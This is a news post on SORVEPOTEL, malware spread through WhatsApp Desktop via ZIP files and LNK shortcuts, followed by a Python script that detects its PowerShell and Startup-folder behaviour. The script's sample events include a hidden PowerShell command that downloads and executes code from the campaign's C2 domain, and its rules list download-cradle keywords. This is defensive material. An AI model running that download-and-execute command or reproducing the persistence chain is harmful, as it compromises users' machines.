NEWS Your friend sent a ZIP file on WhatsApp? It's already infected, and you're next.

ExcalibuR
Hundreds of companies hit by SORVEPOTEL. It doesn't steal data. It doesn't demand a ransom. It just endlessly multiplies.

Trend Micro researchers have documented a large-scale malware campaign targeting users in Brazil. The distribution is carried out through the desktop version of WhatsApp and is characterized by a high infection rate. The malware, internally named SORVEPOTEL, does not engage in data theft or encryption, as is typical for spyware or ransomware. Its main goal is to replicate as quickly as possible and infect new systems.

The infection begins with a phishing message coming from an already compromised WhatsApp contact. This creates an illusion of authenticity and prompts the victim to open the attached ZIP file. The file is disguised as a harmless document—such as a receipt or a file supposedly related to a medical application. According to Trend Micro data, in some cases, a similar ZIP archive has also been distributed via email from fake but seemingly plausible addresses.

Once the user opens the archive, their attention is drawn to the included Windows shortcut (LNK file). Executing this shortcut discreetly activates a PowerShell script, which connects to an external server (e.g., sorvetenopoate[.]com) and downloads the main malicious component. The downloaded script is added to the startup sequence via the Windows Startup system folder to run automatically upon every reboot. It also contains a PowerShell command to contact a command-and-control (C2) server for further instructions or to download other malicious modules.

Of course, the distribution mechanism via WhatsApp Web is the central element of the entire scheme. If the malware detects that the web version of the messenger is active on the infected machine, it automatically sends the same ZIP file to all of the user's contacts and group chats. This self-propagation method through WhatsApp allows the malware to rapidly spread to new systems with almost no human intervention.

According to Trend Micro, "this automatic mass-messaging results in a large amount of spam messages and often ends with WhatsApp blocking the compromised account for violating its terms of service." The researchers note that the campaign operators appear to be interested primarily in the scale of the infection, rather than access to confidential information. No signs of data theft or file encryption were detected.

Out of 477 recorded infection cases, 457 were in Brazil. Government entities, as well as organizations in the education, industrial, technology, construction, and utility sectors were hit. The researchers emphasize that the phishing message text is designed to be opened specifically on a computer, which may indicate a focus on the business environment rather than ordinary users.

"SORVEPOTEL demonstrates how cybercriminals are increasingly using popular communication platforms like WhatsApp for fast, large-scale malware distribution with minimal victim involvement," Trend Micro concludes.
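The infection chain described in the post (a shortcut spawning a hidden PowerShell download cradle, a script dropped into the Startup folder, contact with the C2 domain quoted by Trend Micro) maps onto a few simple detection rules over endpoint telemetry. The following is an added example, not code from the post or from Trend Micro: it runs those rules over a handful of constructed Sysmon-style process-creation and file-creation events. The event field names, the sample paths and the benign events are assumptions for illustration; the only indicator taken from the post is the C2 domain, which the post gives in defanged form.

```python
import re

# The one indicator quoted in the post above (written there as sorvetenopoate[.]com).
KNOWN_C2_DOMAINS = {"sorvetenopoate.com"}

# Persistence location named in the post: the per-user Windows Startup folder.
STARTUP_DIR_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
SCRIPT_EXTS = (".ps1", ".lnk", ".cmd", ".bat", ".vbs", ".js", ".hta")

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
# Common PowerShell "download cradle" primitives; any of them in a command line is worth a look.
DOWNLOAD_CRADLE_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient"
    r"|start-bitstransfer|invoke-restmethod)",
    re.I,
)
HIDDEN_WINDOW_RE = re.compile(r"-(w|windowstyle)\s+hidden", re.I)


def refang(indicator: str) -> str:
    """Turn a defanged indicator (sorvetenopoate[.]com, hxxp://...) back into a matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(event: dict) -> list:
    """Return the names of every rule the event trips (empty list when it looks benign)."""
    hits = []
    kind = event.get("type")
    if kind == "ProcessCreate":
        image = _basename(event.get("image", ""))
        parent = _basename(event.get("parent_image", ""))
        cmd = event.get("command_line", "")
        if image in POWERSHELL_IMAGES:
            if DOWNLOAD_CRADLE_RE.search(cmd):
                hits.append("powershell_download_cradle")
            # Double-clicking a .lnk makes explorer.exe the parent of whatever the shortcut runs;
            # a hidden-window PowerShell child of Explorer is rarely something a user meant to do.
            if parent == "explorer.exe" and HIDDEN_WINDOW_RE.search(cmd):
                hits.append("hidden_powershell_from_explorer")
        lowered = cmd.lower()
        if any(domain in lowered for domain in KNOWN_C2_DOMAINS):
            hits.append("known_c2_domain")
    elif kind == "FileCreate":
        target = event.get("target_filename", "")
        if STARTUP_DIR_RE.search(target) and target.lower().endswith(SCRIPT_EXTS):
            hits.append("startup_folder_persistence")
    return hits


def detect(events: list) -> list:
    """Run every rule over a list of events; returns (event_index, rule_name) pairs in order."""
    return [(idx, rule) for idx, ev in enumerate(events) for rule in check_event(ev)]


# Constructed sample telemetry (Sysmon-like field names are an assumption, not a real capture).
SAMPLE_EVENTS = [
    {   # shortcut launched from Explorer, hidden PowerShell, cradle pointed at the quoted C2
        "type": "ProcessCreate",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe -w hidden -ep bypass -c "
                        "\"IEX (New-Object Net.WebClient).DownloadString('https://sorvetenopoate.com/loader')\"",
    },
    {   # downloaded script written to the Startup folder for persistence
        "type": "FileCreate",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "target_filename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.ps1",
    },
    {   # benign: developer running PowerShell from an editor
        "type": "ProcessCreate",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Program Files\Microsoft VS Code\Code.exe",
        "command_line": "powershell.exe -NoProfile -c Get-ChildItem",
    },
    {   # benign: Word saving a document
        "type": "FileCreate",
        "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "target_filename": r"C:\Users\alice\Documents\receipt.docx",
    },
]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Only the first two constructed events fire: the Explorer-spawned hidden PowerShell trips three rules at once (cradle, hidden window from Explorer, known C2 domain), and the `.ps1` written to the Startup folder trips the persistence rule; the two benign events produce nothing. In a real deployment the C2 set would be fed from the vendor report and the Startup-folder rule would be paired with an alert on WhatsApp Web sessions sending many attachments in a short window, which is the propagation behaviour the post describes.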